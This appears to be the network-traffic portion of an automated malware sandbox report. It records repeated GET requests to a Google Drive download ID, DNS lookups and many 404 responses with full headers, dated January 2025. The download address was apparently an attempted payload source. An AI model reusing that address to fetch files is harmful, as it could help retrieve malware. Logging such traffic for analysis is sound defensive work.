      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /download?id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1BJN1_fsKLMWnsnQ-ywhCg3jibOCgamLP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ2rQlINRCcUrcm12Z2EJjQL-kWl05VX5QWdGnN-xgU3naMid1RB4AZLUIEv6dEskZFContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:01:52 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-5JFBfqfOh-lh1z2P86CmbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerSet-Cookie: 
NID=520=EcPdsYZ1s6i5FzotJ-dJvxZiLCQOJmBXwqKmEFqzYvZLjPeC3_GhUYqtlMyow-AT8Bk6XGmw8SFOZaf7VITWkTUnCA-f5Sc-FdxNoX_GbnHo2RyYyNXaSb7lM07ZHoYxNFa6lHUAvcOHg-0gmcRs7pTwRuUVapMkvMXLusT0etD7vsgu_sU65oUz; expires=Sat, 12-Jul-2025 23:01:52 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSpW8xOBkAT9QS_U2uFK7G2-VYKzvqNwhAZcILYHX2sLMQqgTchQtfFpiSW_7er8LZIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:18 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-_1VUzfPAhMgPFEk-nWcpKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTWTk6Rnm6tHw3CUxkSbHBSNqRqmWJ-rLpAywEjnUSZpEXOaDvgXiG2sv1tywhr9DQoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:20 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-YzHRFf_zHNuMlgTDexlLrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQbtT-SmhVWmbRcqzXReMvBwkPJ50Yw4cSFweR62CINTu7OcglTdyk0EDIsuebAxWItContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:23 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-3Ufck2_7x0RIrS75j7neiA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6M2NSFkfJFvcrBtQ_XHtvHGsKKJ6vXRXKJIpBUQsOTZ1hIO1-8TWika3XjNPQ42cm32P5sXNEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:25 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-B3Toi5nMbhkHph8dgDbyBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRdwd7Fv5Kv1lH39iPGzoXRW3WHictUyQMuZKxBrVkmSuYPAz0Sgpqz52glCh0apQ8GCCMObYQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:27 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-uyqkNyigyjZ1nIZMWNBJYA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRi3d3Y2OIlsvhVxvNWs1evwkUwMmEpZwWGb0aYWBqGH7JhEH4urKGfs-1GS82Ly9K6Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:29 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-1FZienMMVOpxJ0EBQZLnaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTDRb1_wZSGmth2kS1GmN3fzAri9Z5-j5n635pLFeDoQGg4lLBMero5b5pAN6n9wR-WContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:32 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-Nh0wu0yUsG5HkeFSJ4rMTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgThbLn6N7E-FLyM8gEELYBtm-GG7SkfBHrC5-8ec9mjV93qn4HJGpeoqCsBZRZiAhWNbh_Ypk4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:34 GMTContent-Security-Policy: script-src 'nonce-yvyr2wOw-mtbn_1v8vZZew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTjowg5kWfr0Wfs6wLkunZEMZxrpbgXbyeJZpSf_Rfmv6WjT3hntnc1GKVmeTEw14vSContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:36 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-_Vczn3OFxjJ22lwq6h98UA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSBrkuQsPgmMEskLxGC8hVJpfkBFz_TA9Kd-xz1ltYF9nPDo0zqAibtQJgWLo7WIU7TContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:38 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-IglOiNTc-nCREr1D1YXe2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRIsS3_VR1zqWgNr05Qpyb2NV_oR098XDlKKkRQR6x8doYWwv4L_9IT-MFIRtJewoQlolLcUygContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:41 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-ado2d8D14lTUJJHIjNGIug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQddutKmDAyiLh6KjyyQXHoFCujtkvNkLpzhF62EnYvRaNnqF9LMzc9hGvxmnzlqDRzContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 23:02:43 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-sMlgXdLfw758_kVJkUeB8Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
